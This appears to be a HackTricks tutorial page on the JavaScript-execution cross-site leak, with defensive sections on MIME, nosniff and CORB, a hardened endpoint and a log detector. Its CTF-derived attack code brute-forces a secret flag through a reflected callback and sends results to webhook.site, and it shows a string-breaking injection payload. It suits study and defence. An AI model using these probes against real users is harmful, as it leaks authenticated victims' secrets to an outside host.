JavaScript Execution XS Leak
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Browse the full HackTricks Training catalogue for the assessment paths (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group, follow @hacktricks_live on X/Twitter, or check the LinkedIn page and YouTube channel.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
This XS-Search primitive turns whether a cross-origin response executes as JavaScript into a Boolean oracle.
The usual setup is:
- Positive state: the target returns attacker-controlled text or sensitive content that does not execute as attacker JavaScript.
- Negative state: the target reflects attacker-controlled text into a place that is parsed as valid JavaScript, so the attacker can force a callback such as `window.parent.foo()`.
- Leak: load the target with a classic `<script src>` and observe whether the callback fires.
This is fundamentally an execution oracle, not a timing oracle. The only thing the attacker needs is a cross-origin script inclusion that behaves differently depending on a secret-dependent branch.
For generic XS-Leaks background, see:
When This Works
This technique is practical when all of the following hold:
- The victim is authenticated to the target origin.
- The attacker can make the victim's browser request a classic script from the target origin.
- One branch returns content that is valid attacker-controlled JavaScript.
- The other branch returns content that does not run the attacker callback.
In practice, the easiest cases are search/debug endpoints that:
- return attacker-controlled text when the guess is wrong
- return a different body when the guess is right
- let the attacker choose a parameter such as `callback`, `hint`, `msg`, or a reflected prefix/suffix
Basic Example
Server-side code that tries `${guess}` as a flag prefix:
```javascript
const express = require("express")
const app = express()

app.get("/guessing", function (req, res) {
  let guess = req.query.guess
  // The page defines foo() and then includes the target's search endpoint as a
  // classic script, passing foo() as the reflected hint
  let page = `<html>
  <head>
    <script>
      function foo() {
        // If not the flag this will be executed
        window.parent.foo()
      }
    </script>
    <script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
  </head>
  <p>hello2</p>
</html>`
  res.send(page)
})

app.listen(3000)
```
Main page that creates iframes pointing to the /guessing page above in order to try every possibility:
```html
<html>
  <head>
    <script>
      let candidateIsGood = false
      let candidate = ""
      let flag = "bi0sctf{"
      let guessIndex = -1
      let flagChars =
        "_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ"
      // this will get called from our iframe IF the candidate is WRONG
      function foo() {
        candidateIsGood = false
      }
      // Every 500 ms evaluate the previous candidate, then load the next one
      let timerId = setInterval(() => {
        if (candidateIsGood) {
          flag = candidate
          guessIndex = -1
          fetch("https://webhook.site/<yours-goes-here>?flag=" + flag)
        }
        // Start with true and change to false if the guess is wrong
        candidateIsGood = true
        guessIndex++
        if (guessIndex >= flagChars.length) {
          fetch("https://webhook.site/<yours-goes-here>")
          return
        }
        let guess = flagChars[guessIndex]
        candidate = flag + guess
        let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(
          candidate
        )}"></iframe>`
        hack.innerHTML = iframe
      }, 500)
    </script>
  </head>
  <p>hello</p>
  <div id="hack"></div>
</html>
```
The attacker logic is:
- Start every candidate as "good".
- Load the target response as a script.
- If the response executes `window.parent.foo()`, mark the candidate as wrong.
- If no callback fires, keep the candidate and continue brute-forcing.
Minimal Probe Pattern
On many real targets the iframe is not needed. Direct script inclusion is enough:
```html
<script>
  let hit = true
  // Reflected by the "wrong guess" branch; resets the flag for this probe
  function miss() {
    hit = false
  }
  // Resolves with the value of `hit` once the script has loaded (or false on error)
  function probe(url) {
    return new Promise((resolve) => {
      hit = true
      const s = document.createElement("script")
      s.src = url
      s.onload = () => resolve(hit)
      s.onerror = () => resolve(false)
      document.head.appendChild(s)
    })
  }
</script>
```
If the "wrong guess" branch reflects `miss()`, then:
- `probe(...) === false` means the callback executed or the load failed
- `probe(...) === true` means the script loaded without running the attacker callback
For reliability, use a fresh script element for every probe and add a cache-buster such as `?r=${crypto.randomUUID()}`.
Modern Caveats
It must be a classic script
This primitive relies on the browser fetching the resource as a classic script. A plain `<script src=...>` without `crossorigin` is fetched in no-cors mode, which is exactly why this old pattern still matters cross-origin.
Do not switch to `type="module"` for this technique:
- cross-origin module scripts require CORS
- many targets that can be included as classic scripts simply fail as modules
MIME type and nosniff decide whether the payload executes
Current browsers are stricter than older writeups suggest. If the target sets `X-Content-Type-Options: nosniff`, the browser blocks a script response whose MIME type is not a JavaScript MIME type.
That means this oracle often depends on:
- whether the target returns `application/javascript` / `text/javascript`
- whether the target returns `text/plain`, `text/html`, or JSON
- whether `nosniff` is present
This is also why some endpoints only leak on one branch: one response is accepted as a script, while the other branch is blocked or parsed differently.
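As an added defender-side example (not code from the original page), `classicScriptWouldRun` models the MIME/nosniff rule described above for a given set of response headers, and `buildSearchResponse` shows a hardened shape for a search/hint endpoint whose hit and miss branches can no longer be told apart by a cross-site `<script src>`. Function names, the header set and the JSON body are assumptions.

```javascript
// Added example, not from the original page. Models the Fetch Standard rules for a
// cross-origin classic <script src> (no-cors): with nosniff only JavaScript MIME types
// run; without it everything runs except image/audio/video and text/csv.
const JS_MIME_TYPES = new Set([
  "application/ecmascript", "application/javascript", "application/x-ecmascript",
  "application/x-javascript", "text/ecmascript", "text/javascript",
  "text/javascript1.0", "text/javascript1.1", "text/javascript1.2",
  "text/javascript1.3", "text/javascript1.4", "text/javascript1.5",
  "text/jscript", "text/livescript", "text/x-ecmascript", "text/x-javascript",
])

// Case-insensitive header lookup; returns the value lowercased, "" when absent.
function header(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name)
  return key ? String(headers[key]).trim().toLowerCase() : ""
}

// True when the browser would execute this response as a classic script.
function classicScriptWouldRun(headers) {
  const mime = header(headers, "content-type").split(";")[0].trim()
  if (header(headers, "x-content-type-options") === "nosniff") {
    return JS_MIME_TYPES.has(mime) // missing or non-JS type is blocked
  }
  if (/^(image|audio|video)\//.test(mime) || mime === "text/csv") return false
  return true // legacy behaviour: text/html, text/plain and JSON all run
}

// Hardened shape for a search endpoint that used to reflect a hint/callback
// parameter: hit and miss answer with identical, non-executable headers, so a
// cross-site <script src> gets onerror in both states and learns nothing.
// The response object shape and the "matched" field are assumptions.
function buildSearchResponse(matched) {
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
      // Refuses no-cors cross-origin loads (classic script included) outright.
      "Cross-Origin-Resource-Policy": "same-origin",
      "Cache-Control": "no-store",
    },
    body: JSON.stringify({ matched: Boolean(matched) }),
  }
}
```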
CORB can change the observable result
CORB adds another branch to consider. If a response is treated as CORB-protected, Chromium may replace it with an empty valid script response instead of surfacing a parse failure. So for some endpoints:
- one state causes a normal script parse / callback
- the other state becomes an empty script and only `onload` fires
That is still a useful oracle, but the signal is now callback vs no callback or onload vs onerror, not just "JavaScript executed or not".
CSP can kill the attacker-controlled branch
A strict CSP on the target response can break this primitive when the reflected branch is no longer executable JavaScript. Public XS-Leak challenge writeups from 2022 to 2024 regularly hinge on this detail:
- `script-src 'none'` can force attackers to move away from the direct execution oracle
- CSP/SRI/CSP-report interactions can still create other leak oracles, but those belong to different pages/techniques
So when the obvious callback trick does not work, check the response headers before giving up on the endpoint.
Useful Variants
Callback-parameter endpoints
The easiest target is a JSONP-style or debug endpoint that accepts a parameter such as:
`callback=...`, `cb=...`, `jsonp=...`, `hint=...`, `msg=...`
If the "miss" branch reflects that value verbatim inside executable JavaScript while the "hit" branch returns different content, you get a direct Boolean oracle with no timing measurement.
Syntax-preserving prefixes and suffixes
Sometimes you cannot fully control the response body, but you can still make the negative branch execute:
- close the current string or function argument
- inject the callback
- comment out the trailing bytes
For example, a reflected branch such as:
```javascript
showResult("<attacker>");
```
can often be turned into:
```javascript
showResult("");window.parent.foo();//");
```
If the positive branch does not reflect that payload, the callback becomes the oracle.
Combining with event-based oracles
If the endpoint is not stable across browsers, combine the execution oracle with the generic script load events already covered in the section index:
- callback fired
- `onload`
- `onerror`
This is especially useful when one branch yields valid JavaScript and the other yields blocked MIME / CORB / CSP behavior.
Related pages:
Practical Notes
- Prefer one bit per request and keep the callback side effect simple.
- If you probe many candidates, remove previously inserted `<script>` elements or isolate each attempt in a fresh iframe.
- Cache and service worker behavior can corrupt the oracle; use cache-busting.
- This primitive is strongest when the negative branch is fully attacker-controlled JavaScript. If you only get partial reflection, the exploit becomes a payload-shaping problem rather than an XS-Search problem.
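An added defender-side example (not from the original page): detection logic that runs over constructed access-log lines and flags the request pattern the brute-force page in the Basic Example produces, namely many cross-site classic-script loads of one endpoint carrying a callback-style parameter (`callback`, `cb`, `jsonp`, `hint`, `msg`) with a different guess on every request. The log format, field names and thresholds are assumptions.

```javascript
// Added example, not from the original page. Log format is an assumption:
// <unix ts> <client ip> "<path?query>" <Sec-Fetch-Dest> <Sec-Fetch-Site>
const CALLBACK_PARAMS = new Set(["callback", "cb", "jsonp", "hint", "msg"])
// Constructed sample: one client enumerating a flag prefix through a hint parameter,
// plus a same-origin page load and a normal JSONP embed that must not be flagged.
const SAMPLE_LOG = [
  '1700000000 203.0.113.5 "/search?query=bi0sctf%7B_&hint=foo()" script cross-site',
  '1700000001 203.0.113.5 "/search?query=bi0sctf%7B0&hint=foo()" script cross-site',
  '1700000001 203.0.113.5 "/search?query=bi0sctf%7B1&hint=foo()" script cross-site',
  '1700000002 203.0.113.5 "/search?query=bi0sctf%7B2&hint=foo()" script cross-site',
  '1700000002 203.0.113.5 "/search?query=bi0sctf%7B3&hint=foo()" script cross-site',
  '1700000003 203.0.113.5 "/search?query=bi0sctf%7B4&hint=foo()" script cross-site',
  '1700000003 198.51.100.7 "/search?query=hello" document same-origin',
  '1700000004 198.51.100.9 "/widget?cb=render" script cross-site',
]
function parseLine(line) {
  const m = line.match(/^(\d+) (\S+) "([^"]+)" (\S+) (\S+)$/)
  if (!m) return null
  const url = new URL(m[3], "http://log.invalid") // base only so the path parses
  return { ts: Number(m[1]), ip: m[2], path: url.pathname, params: url.searchParams, dest: m[4], site: m[5] }
}
// Groups cross-site script loads that carry a callback-style parameter by client and
// path, and reports groups with >= minGuesses distinct non-callback query values
// inside windowSec. Legit JSONP embeds repeat the same query; enumeration does not.
function findExecutionOracleProbing(lines, { windowSec = 60, minGuesses = 5 } = {}) {
  const groups = new Map()
  for (const line of lines) {
    const r = parseLine(line)
    if (!r || r.dest !== "script" || r.site !== "cross-site") continue
    const keys = [...r.params.keys()]
    if (!keys.some((k) => CALLBACK_PARAMS.has(k.toLowerCase()))) continue
    const guess = keys.filter((k) => !CALLBACK_PARAMS.has(k.toLowerCase()))
      .map((k) => `${k}=${r.params.get(k)}`).join("&")
    const key = `${r.ip} ${r.path}`
    if (!groups.has(key)) groups.set(key, { times: [], guesses: new Set() })
    groups.get(key).times.push(r.ts)
    groups.get(key).guesses.add(guess)
  }
  const findings = []
  for (const [key, g] of groups) {
    const span = Math.max(...g.times) - Math.min(...g.times)
    if (g.guesses.size >= minGuesses && span <= windowSec) {
      findings.push({ client: key, distinctGuesses: g.guesses.size, spanSec: span })
    }
  }
  return findings
}
```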
References
- https://xsleaks.dev/docs/attacks/error-events/
- https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/